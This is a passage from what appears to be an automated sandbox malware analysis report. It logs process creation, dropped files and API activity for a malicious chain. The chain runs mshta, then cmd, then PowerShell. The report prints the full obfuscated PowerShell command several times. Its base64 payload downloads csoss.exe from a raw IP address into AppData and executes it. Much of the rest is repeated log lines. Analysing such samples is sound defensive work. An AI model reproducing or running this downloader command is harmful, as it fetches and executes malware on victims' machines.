4ZSIsMCwwKTtzVGFyVC1zbEVFcCgzKTtJblZvS0UtaXRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXGNzb3NzLmV4ZSI='+[cHar]0x22+'))')))"Jump to behavior
                    Suspicious command line found
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C POwErsHeLl.exe -eX bYPasS -NOP -w 1 -C DEVICEcrEDeNtIaLDePLoyMEnt ; iEx($(IEX('[SYstEM.TEXT.encOdInG]'+[ChaR]0x3a+[CHAR]0X3A+'UtF8.geTsTRinG([SyStEm.ConVert]'+[cHAr]0x3a+[ChaR]58+'frOmBAsE64striNg('+[CHar]34+'JEdhICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlcmRFRmlOSXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ1dRaXBNREdkcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamdrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFaXpjTUh2dkJaLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVEdORG9HcUNLRyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWR1ZhbyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRHYTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC8xMjAvY3Nvc3MuZXhlIiwiJEVOdjpBUFBEQVRBXGNzb3NzLmV4ZSIsMCwwKTtzVGFyVC1zbEVFcCgzKTtJblZvS0UtaXRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXGNzb3NzLmV4ZSI='+[cHar]0x22+'))')))"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C POwErsHeLl.exe -eX bYPasS -NOP -w 1 -C DEVICEcrEDeNtIaLDePLoyMEnt ; iEx($(IEX('[SYstEM.TEXT.encOdInG]'+[ChaR]0x3a+[CHAR]0X3A+'UtF8.geTsTRinG([SyStEm.ConVert]'+[cHAr]0x3a+[ChaR]58+'frOmBAsE64striNg('+[CHar]34+'JEdhICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlcmRFRmlOSXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ1dRaXBNREdkcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamdrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFaXpjTUh2dkJaLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVEdORG9HcUNLRyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWR1ZhbyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRHYTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC8xMjAvY3Nvc3MuZXhlIiwiJEVOdjpBUFBEQVRBXGNzb3NzLmV4ZSIsMCwwKTtzVGFyVC1zbEVFcCgzKTtJblZvS0UtaXRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXGNzb3NzLmV4ZSI='+[cHar]0x22+'))')))"Jump to behavior
                    Suspicious powershell command line found
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwErsHeLl.exe -eX bYPasS -NOP -w 1 -C DEVICEcrEDeNtIaLDePLoyMEnt ; iEx($(IEX('[SYstEM.TEXT.encOdInG]'+[ChaR]0x3a+[CHAR]0X3A+'UtF8.geTsTRinG([SyStEm.ConVert]'+[cHAr]0x3a+[ChaR]58+'frOmBAsE64striNg('+[CHar]34+'JEdhICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlcmRFRmlOSXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ1dRaXBNREdkcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamdrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFaXpjTUh2dkJaLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVEdORG9HcUNLRyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWR1ZhbyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRHYTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC8xMjAvY3Nvc3MuZXhlIiwiJEVOdjpBUFBEQVRBXGNzb3NzLmV4ZSIsMCwwKTtzVGFyVC1zbEVFcCgzKTtJblZvS0UtaXRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXGNzb3NzLmV4ZSI='+[cHar]0x22+'))')))"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwErsHeLl.exe -eX bYPasS -NOP -w 1 -C DEVICEcrEDeNtIaLDePLoyMEnt ; iEx($(IEX('[SYstEM.TEXT.encOdInG]'+[ChaR]0x3a+[CHAR]0X3A+'UtF8.geTsTRinG([SyStEm.ConVert]'+[cHAr]0x3a+[ChaR]58+'frOmBAsE64striNg('+[CHar]34+'JEdhICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlcmRFRmlOSXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ1dRaXBNREdkcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamdrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFaXpjTUh2dkJaLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVEdORG9HcUNLRyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWR1ZhbyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRHYTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC8xMjAvY3Nvc3MuZXhlIiwiJEVOdjpBUFBEQVRBXGNzb3NzLmV4ZSIsMCwwKTtzVGFyVC1zbEVFcCgzKTtJblZvS0UtaXRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXGNzb3NzLmV4ZSI='+[cHar]0x22+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\43swuu3x\43swuu3x.cmdline"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\43swuu3x\43swuu3x.cmdline"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D04B37 LoadLibraryA,GetProcAddress,6_2_00D04B37
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_044856F3 pushad ; ret 3_2_04485721
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04485723 pushfd ; ret 3_2_04485731
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D28945 push ecx; ret 6_2_00D28958
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\csoss.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\43swuu3x\43swuu3x.dllJump to dropped file
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\csoss[1].exeJump to dropped file

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,6_2_00D048D7
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D85376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,6_2_00D85376
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D23187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_00D23187
                    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
